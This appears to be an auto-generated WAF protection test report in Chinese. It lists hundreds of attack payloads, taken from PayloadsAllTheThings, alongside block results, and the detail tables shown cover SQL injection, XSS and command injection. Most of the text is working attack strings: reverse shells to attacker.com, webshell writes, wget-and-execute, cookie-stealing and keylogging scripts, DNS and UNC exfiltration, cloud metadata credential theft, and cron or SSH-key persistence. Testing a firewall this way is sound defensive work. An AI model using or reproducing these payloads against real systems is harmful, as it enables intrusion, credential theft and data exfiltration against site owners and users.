防护能力测试报告

报告由 jxwaf-test 生成于 2026-05-30 13:34:45
测试POC来源: PayloadsAllTheThings

1. 测试概览

指标数值
WAF 目标地址http://dev.jxwaf.com/account_init_check
测试项目分类数36
测试项目总数477
通过(成功拦截)461
未通过(漏报)16
请求异常0
综合通过率96.6%
拦截判定标准HTTP [403]

2. 测试覆盖分类

以下为本次测试覆盖的攻击类型及所属大类

分类项目数所属大类
sql injection24SQL 注入
mysql injection17SQL 注入
mssql injection19SQL 注入
postgresql injection18SQL 注入
oracle injection17其他
sqlite injection10SQL 注入
xss22XSS
xss by context15XSS
command injection20命令注入
file inclusion11其他
directory traversal12其他
ssti18服务端注入
xxe14XXE
ssi injection12服务端注入
xpath injection13其他注入
prototype pollution12原型污染
xslt injection12服务端注入
graphql injection12其他注入
java php dotnet deserialization7反序列化
java deserialization11反序列化
php deserialization6反序列化
python deserialization7反序列化
dotnet deserialization4反序列化
nodejs deserialization6反序列化
ruby deserialization3反序列化
file upload16文件上传
waf bypass sqli20SQL 注入、WAF 绕过
waf bypass sqli db16SQL 注入、WAF 绕过
waf bypass xss19XSS、WAF 绕过
waf bypass command18命令注入、WAF 绕过
waf bypass path11WAF 绕过
waf bypass lfi9文件包含、WAF 绕过
waf bypass xxe11XXE、WAF 绕过
waf bypass upload15文件上传、WAF 绕过
waf bypass general10WAF 绕过
latex injection10其他注入

3. 分类通过率汇总

分类项目数通过未通过异常通过率
sql injection242400████████████████████ 100.0%
mysql injection171700████████████████████ 100.0%
mssql injection191900████████████████████ 100.0%
postgresql injection181800████████████████████ 100.0%
oracle injection171700████████████████████ 100.0%
sqlite injection101000████████████████████ 100.0%
xss222200████████████████████ 100.0%
xss by context151500████████████████████ 100.0%
command injection201910███████████████████░ 95.0%
file inclusion111100████████████████████ 100.0%
directory traversal121200████████████████████ 100.0%
ssti181800████████████████████ 100.0%
xxe141400████████████████████ 100.0%
ssi injection121200████████████████████ 100.0%
xpath injection131300████████████████████ 100.0%
prototype pollution121020████████████████░░░░ 83.3%
xslt injection121200████████████████████ 100.0%
graphql injection121110█░░░░░░░░░░░░░░░░░░░ 8.3%
java php dotnet deserialization7700████████████████████ 100.0%
java deserialization111100████████████████████ 100.0%
php deserialization6600████████████████████ 100.0%
python deserialization7700████████████████████ 100.0%
dotnet deserialization4400████████████████████ 100.0%
nodejs deserialization6600████████████████████ 100.0%
ruby deserialization3300████████████████████ 100.0%
file upload161600████████████████████ 100.0%
waf bypass sqli202000████████████████████ 100.0%
waf bypass sqli db161600████████████████████ 100.0%
waf bypass xss191900████████████████████ 100.0%
waf bypass command181800████████████████████ 100.0%
waf bypass path111010██████████████████░░ 90.9%
waf bypass lfi9900████████████████████ 100.0%
waf bypass xxe111100████████████████████ 100.0%
waf bypass upload151500████████████████████ 100.0%
waf bypass general101000████████████████████ 100.0%
latex injection10910██████████████████░░ 90.0%

综合通过率: 461/477 = 96.6%

4. 分类测试详情

状态: 🛡️ 通过 | ⚠️ 未通过 | ❌ 异常

4.1 sql injection

  • 项目数: 24 | 通过: 24 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTSQL 注入 - 报错注入(通过报错泄露数据)' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1'='1403
🛡️POSTSQL 注入 - 联合查询注入(提取数据库版本、用户名、表名)' UNION SELECT 1,version(),user(),database(),5-- -403
🛡️POSTSQL 注入 - 时间盲注(延时5秒)' AND (SELECT SLEEP(5))--403
🛡️POSTSQL 注入 - 堆叠查询(删表)'; DROP TABLE users--403
🛡️POSTSQL 注入 - 万能密码绕过登录' OR '1'='1'--403
🛡️POSTSQL 注入 - 布尔盲注(逐字符猜解管理员密码)' AND SUBSTRING((SELECT password FROM users WHERE username='admin' LIMIT 1),1,1)='a'--403
🛡️POSTSQL 注入 - 读取系统文件 (/etc/passwd)' UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4,5--403
🛡️POSTSQL 注入 - 写入 Webshell 到 Web 目录' UNION SELECT 1,'<?php system($_GET["cmd"]);?>',3,4,5 INTO OUTFILE '/var/www/html/shell.php'--403
🛡️POSTSQL 注入 - 注入绕过空格过滤 (注释符替代空格)'/**/OR/**/1=1/**/--403
🛡️POSTSQL 注入 - 双写绕过关键字过滤提取数据' UNIUNIONSELECTON SELECT user(),database(),version(),4,5--403
🛡️POSTSQL 注入 - 宽字节注入绕过转义 (GBK)%df' OR 1=1--403
🛡️POSTSQL 注入 - PostgreSQL COPY 命令写入文件 RCE'; COPY (SELECT '<?php system($_GET["cmd"]);?>') TO '/var/www/html/pg.php'--403
🛡️POSTSQL 注入 - MSSQL xp_cmdshell 执行系统命令'; EXEC xp_cmdshell('whoami')--403
🛡️POSTSQL 注入 - Oracle UTL_HTTP SSRF 攻击内网' UNION SELECT UTL_HTTP.REQUEST('http://169.254.169.254/latest/meta-data/') FROM dual--403
🛡️POSTSQL 注入 - DNS 带外数据泄露 (MySQL load_file + DNS)' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\a'))--403
🛡️POSTSQL 注入 - 科学计数法绕过 WAF (等价于 1=1)' OR 1.e(1)=1.e(1)--403
🛡️POSTSQL 注入 - 十六进制编码绕过 WAF 关键字检测' UNION SELECT 0x61646d696e,2,3,4,5--403
🛡️POSTSQL 注入 - 内联注释绕过 WAF 关键字检测提取数据' /*!UNION*/ /*!SELECT*/ user(),database(),version(),4,5--403
🛡️POSTSQL 注入 - ORDER BY 注入提取表名列名' ORDER BY (SELECT 1 FROM information_schema.columns WHERE table_name='users' AND column_name='password')--403
🛡️POSTSQL 注入 - 百分号绕过 WAF (MySQL # 替换 -- 注释)' UNION SELECT 1,2,3,4 FROM dual WHERE 1=1 AND 2344=2344 AND '1q'='1q403
🛡️POSTSQL 注入 - GROUP BY 注入提取数据' GROUP BY (SELECT password FROM users WHERE username='admin')--403
🛡️POSTSQL 注入 - MySQL UDF 动态库写入提权 RCE' UNION SELECT 0x7F454C46...,2,3,4,5 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so'--403
🛡️POSTSQL 注入 - PostgreSQL 大对象写入文件 RCE'; SELECT lo_export(lo_create(99999),'/var/www/html/lo.php'); INSERT INTO pg_largeobject VALUES (99999,0,'<?php system($_GET[1]);?>')--403
🛡️POSTSQL 注入 - MSSQL sp_OACreate 写入文件 Getshell'; DECLARE @o INT; EXEC sp_OACreate 'Scripting.FileSystemObject',@o OUT; EXEC sp_OAMethod @o,'CreateTextFile',NULL,'C:\inetpub\wwwroot\shell.asp'; EXE...403

4.2 mysql injection

  • 项目数: 17 | 通过: 17 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTMySQL - UNION 查询窃取全部用户密码哈希' UNION SELECT 1,user,password,4,5 FROM mysql.user--403
🛡️POSTMySQL - LOAD_FILE 读取系统密码文件' UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4,5--403
🛡️POSTMySQL - INTO OUTFILE 写入 Webshell' UNION SELECT 1,'<?php system($_GET[1]);?>',3,4,5 INTO OUTFILE '/var/www/html/shell.php'--403
🛡️POSTMySQL - SLEEP 时间盲注获取管理员密码 (逐字符)' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)--403
🛡️POSTMySQL - INTO DUMPFILE 写入二进制文件' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b315d293b3f3e INTO DUMPFILE '/var/www/html/shell.php'--403
🛡️POSTMySQL - BENCHMARK 延时注入替代 SLEEP' AND IF(SUBSTRING(user(),1,1)='r',BENCHMARK(5000000,MD5('x')),0)--403
🛡️POSTMySQL - updatexml 报错注入泄露数据' AND updatexml(1,concat(0x7e,(SELECT password FROM users LIMIT 1),0x7e),1)--403
🛡️POSTMySQL - extractvalue 报错注入泄露数据' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--403
🛡️POSTMySQL - NAME_CONST 报错注入' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) AS x)--403
🛡️POSTMySQL - 双查询报错注入 (floor/rand)' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--403
🛡️POSTMySQL - 多语句堆叠查询创建管理员用户'; INSERT INTO users(username,password,role) VALUES('hacker','p@ss','admin')--403
🛡️POSTMySQL - 堆叠查询执行系统命令 (sys_exec UDF)'; SELECT sys_exec('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"')--403
🛡️POSTMySQL - DNS 带外数据泄露 (UNC Path SMB 窃取 NTLM Hash)' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\a'))--403
🛡️POSTMySQL - DNS 带外数据泄露 (Windows)' UNION SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',(SELECT user())))--403
🛡️POSTMySQL - 无 information_schema 提取表名 (sys.schema_auto_increment_columns)' UNION SELECT table_name FROM sys.schema_auto_increment_columns WHERE table_schema=database()--403
🛡️POSTMySQL - 无列名提取数据 (JOIN USING)' UNION SELECT * FROM (SELECT * FROM users AS a JOIN users AS b USING(id,username,password))x--403
🛡️POSTMySQL - 无列名提取数据 (等值比较)' UNION SELECT 2 FROM (SELECT 1,2,3 UNION SELECT * FROM users)x LIMIT 1,1--403

4.3 mssql injection

  • 项目数: 19 | 通过: 19 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTMSSQL - xp_cmdshell 反弹 Shell'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'powershell -c IEX(New-O...403
🛡️POSTMSSQL - xp_cmdshell 读取系统文件'; EXEC xp_cmdshell 'type C:\windows\system32\drivers\etc\hosts'--403
🛡️POSTMSSQL - sp_OACreate 执行命令 (禁用 xp_cmdshell 时)'; DECLARE @o INT; EXEC sp_OACreate 'WScript.Shell',@o OUT; EXEC sp_OAMethod @o,'Run',NULL,'cmd.exe /c whoami > C:\temp\out.txt'--403
🛡️POSTMSSQL - xp_cmdshell 写入 Webshell'; EXEC xp_cmdshell 'echo ^<% Execute(Request("cmd")) %^> > C:\inetpub\wwwroot\shell.asp'--403
🛡️POSTMSSQL - OpenRowset 窃取数据到攻击者服务器'; INSERT INTO OPENROWSET('SQLOLEDB','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=attacker.com,80;','SELECT * FROM injected') SELECT name,password FRO...403
🛡️POSTMSSQL - sp_OACreate 写入 Webshell'; DECLARE @o INT; EXEC sp_OACreate 'Scripting.FileSystemObject',@o OUT; EXEC sp_OAMethod @o,'CreateTextFile',NULL,'C:\inetpub\wwwroot\shell.asp'; EXE...403
🛡️POSTMSSQL - xp_dirtree UNC 路径注入窃取 NTLM 哈希'; EXEC master..xp_dirtree '\\attacker.com\share'--403
🛡️POSTMSSQL - xp_subdirs UNC 路径注入窃取 NTLM 哈希'; EXEC master..xp_subdirs '\\attacker.com\share'--403
🛡️POSTMSSQL - xp_fileexist UNC 路径注入窃取 NTLM 哈希'; EXEC master..xp_fileexist '\\attacker.com\share\test.txt'--403
🛡️POSTMSSQL - 信任链接横向移动 (Linked Server)'; SELECT * FROM OPENQUERY(LINKED_SERVER,'SELECT @@version')--403
🛡️POSTMSSQL - OPENROWSET 联合查询 + 堆叠执行系统命令'; EXEC xp_cmdshell 'powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAb...403
🛡️POSTMSSQL - 信任链接命令执行 (Linked Server + xp_cmdshell)'; EXEC ('EXEC xp_cmdshell ''whoami''') AT LINKED_SERVER--403
🛡️POSTMSSQL - CLR 程序集加载执行命令 (高权限)'; CREATE ASSEMBLY SQLCLR FROM 0x4D5A... WITH PERMISSION_SET=UNSAFE; CREATE PROCEDURE CmdExec AS EXTERNAL NAME SQLCLR.StoredProcedures.CmdExec--403
🛡️POSTMSSQL - 错误信息泄露数据 (CONVERT/CAST)' AND 1=CONVERT(INT,(SELECT TOP 1 table_name FROM information_schema.tables))--403
🛡️POSTMSSQL - OLE 自动化对象写入文件'; DECLARE @o INT; EXEC sp_OACreate 'ADODB.Stream',@o OUT; EXEC sp_OASetProperty @o,'Type',2; EXEC sp_OAMethod @o,'Open'; EXEC sp_OAMethod @o,'WriteTe...403
🛡️POSTMSSQL - xp_regread 读取注册表存储的密码'; EXEC xp_regread N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities'--403
🛡️POSTMSSQL - xp_servicecontrol 启动/停止服务'; EXEC xp_servicecontrol 'start','MSSQLSERVER'--403
🛡️POSTMSSQL - 查询 MSSQL 版本和数据库列表' UNION SELECT @@version,DB_NAME(),3,4,5--403
🛡️POSTMSSQL - 延时注入 WAITFOR DELAY'; IF (SELECT COUNT(*) FROM sys.sql_logins WHERE PWDCOMPARE('p@ss')=1)=1 WAITFOR DELAY '0:0:5'--403

4.4 postgresql injection

  • 项目数: 18 | 通过: 18 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTPostgreSQL - COPY 命令写入文件 RCE'; COPY (SELECT '<?php system($_GET[1]);?>') TO '/var/www/html/pg.php'--403
🛡️POSTPostgreSQL - COPY FROM PROGRAM RCE'; COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'--403
🛡️POSTPostgreSQL - 大对象 lo_export 写入 Webshell'; SELECT lo_export(lo_create(99999),'/var/www/html/lo.php'); INSERT INTO pg_largeobject VALUES (99999,0,'<?php system($_GET[1]);?>')--403
🛡️POSTPostgreSQL - pg_read_file 读取系统文件' UNION SELECT pg_read_file('/etc/passwd'),2,3,4,5--403
🛡️POSTPostgreSQL - pg_ls_dir 列目录' UNION SELECT pg_ls_dir('/var/www'),2,3,4,5--403
🛡️POSTPostgreSQL - pg_read_file 读取 /etc/shadow' UNION SELECT pg_read_file('/etc/shadow',0,9999),2,3,4,5--403
🛡️POSTPostgreSQL - 延时注入 (pg_sleep)' AND (SELECT CASE WHEN (SELECT current_setting('is_superuser'))='on' THEN pg_sleep(5) ELSE pg_sleep(0) END)--403
🛡️POSTPostgreSQL - CAST 报错注入泄露版本' AND 1337=CAST((SELECT version()) AS INT)--403
🛡️POSTPostgreSQL - CAST 报错注入泄露数据' AND 1337=CAST((SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema=current_schema()) AS INT)--403
🛡️POSTPostgreSQL - 堆叠查询 + COPY FROM PROGRAM 反弹 Shell'; COPY (SELECT '') TO PROGRAM 'perl -e "use Socket;$i=\"attacker.com\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockad...403
🛡️POSTPostgreSQL - DNS 带外数据泄露'; COPY (SELECT (SELECT password FROM users LIMIT 1)) TO PROGRAM 'nslookup $(cat).attacker.com'--403
🛡️POSTPostgreSQL - 堆叠查询创建超级用户'; CREATE USER hacker WITH SUPERUSER PASSWORD 'p@ss'--403
🛡️POSTPostgreSQL - CREATE FUNCTION 用户定义函数执行命令'; CREATE OR REPLACE FUNCTION system(cmd text) RETURNS void AS $$ BEGIN EXECUTE cmd; END; $$ LANGUAGE plpgsql; SELECT system('cat /etc/shadow')--403
🛡️POSTPostgreSQL - 报错注入 (RAISE)' AND 1=(SELECT CASE WHEN (SELECT current_user)='postgres' THEN 1/0 ELSE 1 END)--403
🛡️POSTPostgreSQL - 类型转换报错注入' AND (SELECT chr(126)||current_database()||chr(126)::NUMERIC)=1--403
🛡️POSTPostgreSQL - 无引号绕过 (CHR 拼接)' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)--403
🛡️POSTPostgreSQL - UNION 提取所有用户密码哈希' UNION SELECT usename,passwd,3,4,5 FROM pg_shadow--403
🛡️POSTPostgreSQL - dblink 扩展横向移动'; SELECT * FROM dblink('host=10.0.0.1 user=postgres password=secret','SELECT version()') AS t(ver TEXT)--403

4.5 oracle injection

  • 项目数: 17 | 通过: 17 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTOracle - UNION 提取数据 (必须带 FROM dual)' UNION SELECT NULL,NULL,username,password FROM all_users--403
🛡️POSTOracle - UNION 提取版本和数据库名' UNION SELECT NULL,banner,NULL,NULL FROM v$version--403
🛡️POSTOracle - 报错注入 (CTXSYS.DRITHSX.SN 函数)' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT password FROM sys.user$ WHERE name='SYS'))--403
🛡️POSTOracle - 报错注入 (UTL_INADDR.get_host_name)' AND 1=UTL_INADDR.get_host_name((SELECT password FROM sys.user$ WHERE name='SYS'))--403
🛡️POSTOracle - 报错注入 (DBMS_XDB_VERSION)' AND (SELECT DBMS_XDB_VERSION.makeversioned((SELECT password FROM sys.user$ WHERE name='SYS')) FROM dual) IS NOT NULL--403
🛡️POSTOracle - 盲注 (SUBSTR + DECODE)' AND (SELECT DECODE(SUBSTR(password,1,1),'A',(SELECT COUNT(*) FROM all_tables)) FROM sys.user$ WHERE name='SYS') IS NOT NULL--403
🛡️POSTOracle - 延时注入 (DBMS_PIPE.RECEIVE_MESSAGE)' AND (SELECT CASE WHEN (SELECT user FROM dual)='SYS' THEN DBMS_PIPE.RECEIVE_MESSAGE(('a'),5) ELSE NULL END FROM dual) IS NOT NULL--403
🛡️POSTOracle - 延时注入 (DBMS_LOCK.SLEEP)'; BEGIN DBMS_LOCK.SLEEP(5); END;--403
🛡️POSTOracle - OOB DNS 外带数据 (UTL_INADDR)' UNION SELECT UTL_INADDR.get_host_address((SELECT password FROM sys.user$ WHERE name='SYS')||'.attacker.com') FROM dual--403
🛡️POSTOracle - OOB DNS 外带数据 (UTL_HTTP)' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT password FROM sys.user$ WHERE name='SYS')) FROM dual--403
🛡️POSTOracle - 堆叠查询修改管理员密码'; UPDATE sys.user$ SET password='hacked' WHERE name='ADMIN'; COMMIT--403
🛡️POSTOracle - Java 存储过程命令执行'; DECLARE l_output DBMS_OUTPUT.CHARARR; l_lines INTEGER:=1000; BEGIN DBMS_JAVA.SET_OUTPUT(1000); DBMS_JAVA.GRANT_PERMISSION('SYS','java.io.FilePermis...403
🛡️POSTOracle - DBMS_XMLQUERY 执行命令'; SELECT DBMS_XMLQUERY.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function xx return varchar2 is ...403
🛡️POSTOracle - 文件读取 (BFILENAME)' UNION SELECT BFILENAME('DIR_NAME','filename'),NULL FROM dual--403
🛡️POSTOracle - 提取数据库链接 (横向移动)' UNION SELECT db_link,username,password,NULL,NULL FROM user_db_links--403
🛡️POSTOracle - Scheduler 任务执行命令'; BEGIN DBMS_SCHEDULER.create_job(job_name=>'JOB',job_type=>'EXECUTABLE',job_action=>'/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"',enab...403
🛡️POSTOracle - UTL_FILE 文件写入 Webshell'; DECLARE f UTL_FILE.FILE_TYPE; BEGIN f:=UTL_FILE.FOPEN('WWWROOT','shell.jsp','w'); UTL_FILE.PUT_LINE(f,'<% Runtime.getRuntime().exec(request.getPara...403

4.6 sqlite injection

  • 项目数: 10 | 通过: 10 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTSQLite - 提取所有表名' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'--403
🛡️POSTSQLite - 提取表结构 (DDL)' UNION SELECT 1,sql,3 FROM sqlite_master WHERE type='table' AND name='users'--403
🛡️POSTSQLite - 提取所有用户数据' UNION SELECT 1,group_concat(username||':'||password),3 FROM users--403
🛡️POSTSQLite - 写文件 (ATTACH DATABASE)'; ATTACH DATABASE '/var/www/html/shell.php' AS shell; CREATE TABLE shell.pwn (dataz TEXT); INSERT INTO shell.pwn VALUES ('<?php system($_GET[1]);?>')...403
🛡️POSTSQLite - 读文件 (readfile)' UNION SELECT 1,readfile('/etc/passwd'),3--403
🛡️POSTSQLite - 创建恶意函数 load_extension'; SELECT load_extension('/tmp/evil.so')--403
🛡️POSTSQLite - 报错注入 (RAISE)' AND (SELECT CASE WHEN (SELECT sql FROM sqlite_master LIMIT 1) LIKE '%password%' THEN RAISE(ABORT,'LEAK') ELSE 1 END)--403
🛡️POSTSQLite - 写 crontab 定时任务'; ATTACH DATABASE '/var/spool/cron/crontabs/root' AS c; CREATE TABLE c.t (data TEXT); INSERT INTO c.t VALUES ('* * * * * bash -i >& /dev/tcp/attacker...403
🛡️POSTSQLite - 覆盖 .bashrc 持久化'; ATTACH DATABASE '/root/.bashrc' AS brc; CREATE TABLE brc.x (d TEXT); INSERT INTO brc.x VALUES ('/tmp/backdoor&'); DETACH DATABASE brc--403
🛡️POSTSQLite - 注入获取 WAL 日志中的敏感数据' UNION SELECT 1,hex(readfile('/var/www/html/db.sqlite-wal')),3--403

4.7 xss

  • 项目数: 22 | 通过: 22 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXSS - 键盘记录回传攻击者服务器<script>document.onkeypress=function(e){new Image().src='http://attacker.com/k?k='+e.key}</script>403
🛡️POSTXSS - Cookie 窃取回传攻击者服务器<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>403
🛡️POSTXSS - 页面内容劫持(伪造登录钓鱼页面)<script>document.body.innerHTML='<h1>Session Expired</h1><form action=http://attacker.com/steal method=post><input name=user><input name=pass type=pas...403
🛡️POSTXSS - SVG onload 窃取 Cookie 回传<svg/onload=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS - img onerror 窃取 Cookie(base64 编码绕过 WAF)<img src=x onerror=eval(atob('ZmV0Y2goJ2h0dHA6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWUp'))>403
🛡️POSTXSS - iframe 全屏加载远程钓鱼页面<iframe src="http://attacker.com/phish" width=100% height=100%>403
🛡️POSTXSS - DOM 注入加载远程恶意脚本"><script>document.write('<script src=http://attacker.com/evil.js><\/script>')</script>403
🛡️POSTXSS - 大小写混淆绕过 script 过滤(窃取 Cookie 回传)<ScRiPt>new Image().src='http://attacker.com/c?'+document.cookie</sCrIpT>403
🛡️POSTXSS - body onload 重定向到钓鱼页面<body onload=document.location='http://attacker.com/phish'>403
🛡️POSTXSS - CSS 注入窃取 CSRF Token 和敏感数据<style>@import url('http://attacker.com/steal?d='+document.cookie+'&t='+document.querySelector('[name=csrf]').value)</style>403
🛡️POSTXSS - mXSS 突变型 XSS(通过 innerHTML 变异绕过净化)<listing><img src=1 onerror=alert(1)></listing>403
🛡️POSTXSS - JSONP 端点劫持 + CSP 绕过<script src="http://victim.com/jsonp?callback=fetch('http://attacker.com/'+document.cookie)"></script>403
🛡️POSTXSS - SVG foreignObject 嵌入 HTML 窃取数据<svg xmlns="http://www.w3.org/2000/svg"><foreignObject width="100%" height="100%"><body xmlns="http://www.w3.org/1999/xhtml"><script>new Image().src='...403
🛡️POSTXSS - 注册 Service Worker 实现持久化劫持<script>navigator.serviceWorker.register('http://attacker.com/sw.js')</script>403
🛡️POSTXSS - CSS keylogger(通过 CSS 属性选择器逐字符窃取输入)<style>input[type=password][value^="a"]{background:url(http://attacker.com/a)}input[type=password][value^="b"]{background:url(http://attacker.com/b)}<...403
🛡️POSTXSS - 利用 postMessage 跨窗口窃取数据<script>window.addEventListener('message',function(e){new Image().src='http://attacker.com/'+e.data})</script>403
🛡️POSTXSS - 利用 window.name 跨域传输窃取数据(XSS 沙箱逃逸)<script>eval('window.name="<script>fetch(http://attacker.com/+document.cookie)<\/script>"')</script>403
🛡️POSTXSS - data:text/html iframe 绕过 CSP<iframe src="data:text/html,<script>new Image().src='http://attacker.com/'+parent.document.cookie</script>">403
🛡️POSTXSS - AngularJS 沙箱逃逸 (1.0-1.5){{constructor.constructor('new Image().src="http://attacker.com/"+document.cookie')()}}403
🛡️POSTXSS - DOM Clobbering 劫持全局变量实现 XSS<form id=x><output id=y>you</output></form><form name=x><input name=parentNode></form><script>alert(x.y.value)</script>403
🛡️POSTXSS - script 标签拆分绕过(字符串拼接)<script>eval("new"+' Image().src="http://attacker.com/"+docu'+'ment.cookie')</script>403
🛡️POSTXSS - HTML5 新标签 onfocus 窃取 Cookie 回传<details open ontoggle=new Image().src='http://attacker.com/'+document.cookie>403

4.8 xss by context

  • 项目数: 15 | 通过: 15 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXSS HTML Context - script 注入加载 Remote JS<script src="http://attacker.com/beef.js"></script>403
🛡️POSTXSS Attribute Context - onerror 事件触发 Remote JS" onerror="fetch('http://attacker.com/'+document.cookie)" x="403
🛡️POSTXSS JavaScript Context - 闭合脚本标签注入</script><script>fetch('http://attacker.com/'+document.cookie)</script>403
🛡️POSTXSS HREF Context - javascript: 伪协议 + Remote JS<a href="javascript:fetch('http://attacker.com/'+document.cookie)">click</a>403
🛡️POSTXSS SVG Context - 内联 script<svg xmlns="http://www.w3.org/2000/svg"><script>fetch('http://attacker.com/'+document.cookie)</script></svg>403
🛡️POSTXSS CSS Context - @import 外带数据</style><body onload=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS Markdown Render - markdown 链接 + onerror[click](javascript:fetch('http://attacker.com/'+document.cookie))403
🛡️POSTXSS Data URI Context - data:image/svg 注入data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('http://attacker.com/'+document.cookie)"/>403
🛡️POSTXSS React JSX - dangerouslySetInnerHTML 绕过<img src=x onerror=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS Vue.js - v-html 指令注入<div v-html="'<img src=x onerror=fetch(http://attacker.com/'+document.cookie)>'"></div>403
🛡️POSTXSS Angular (1.x) - $sanitize 绕过模板注入{{constructor.constructor('fetch(http://attacker.com/+document.cookie)')()}}403
🛡️POSTXSS Angular (2+) - DomSanitizer bypassSecurityTrustHtml<img src=x onerror=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS JSON Context - 闭合 JSON 字符串注入{"name":"</script><script>fetch('http://attacker.com/'+document.cookie)</script>"}403
🛡️POSTXSS PostMessage Context - 监听窃取跨域消息<script>window.addEventListener('message',function(e){new Image().src='http://attacker.com/'+btoa(e.data)})</script>403
🛡️POSTXSS DOM Clobbering - 表单元素劫持<form id="config"><input name="apiEndpoint" value="http://attacker.com/steal"></form><script>fetch(config.apiEndpoint.value+'?c='+document.cookie)</sc...403

4.9 command injection

  • 项目数: 20 | 通过: 19 | 通过率: 95.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POST命令注入 - 远程下载并执行木马; wget http://attacker.com/shell.sh -O /tmp/.x; bash /tmp/.x403
🛡️POST命令注入 - 反弹 Shell (bash TCP); bash -i >& /dev/tcp/attacker.com/4444 0>&1403
🛡️POST命令注入 - 读取系统密码文件| cat /etc/shadow403
🛡️POST命令注入 - 写入 SSH 公钥持久化; echo 'ssh-rsa AAAA...' >> ~/.ssh/authorized_keys403
🛡️POST命令注入 - 管道符绕过 + DNS 外带数据|curl attacker.com/whoami||403
🛡️POST命令注入 - 反引号命令外带数据到攻击者服务器cat /etc/shadow|base64|curl attacker.com -d @-403
🛡️POST命令注入 - base64 编码绕过执行; echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash403
🛡️POST命令注入 - $IFS 无空格绕过读取密码文件;cat$IFS/etc/passwd403
🛡️POST命令注入 - PowerShell 编码执行下载木马 (Windows); powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABw...403
🛡️POST命令注入 - 通配符绕过命令执行;/??n?/?at /???/????wd403
🛡️POST命令注入 - 美元符号命令替换绕过过滤$(cat /etc/passwd)403
🛡️POST命令注入 - Python 反弹 Shell 绕过 bash 限制; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os....403
🛡️POST命令注入 - Perl 反弹 Shell; perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDI...403
🛡️POST命令注入 - 十六进制编码绕过关键词过滤; $(echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")403
🛡️POST命令注入 - nc 反弹 Shell; nc attacker.com 4444 -e /bin/bash403
🛡️POST命令注入 - 八进制编码绕过关键词过滤;eval $'\143\141\164\040\057\145\164\143\057\160\141\163\163\167\144'403
🛡️POST命令注入 - DNS 外带数据泄露文件内容; for l in $(cat /etc/passwd|base64 -w0|fold -w63);do dig $l.attacker.com;done403
⚠️POST命令注入 - nmap 扫描内网端口; nmap -Pn -p 22,80,443,3306,6379 10.0.0.0/24200
🛡️POST命令注入 - curl 读取云元数据 (AWS IMDSv1); curl http://169.254.169.254/latest/meta-data/iam/security-credentials/admin -o /tmp/aws.txt; curl attacker.com -d @/tmp/aws.txt403
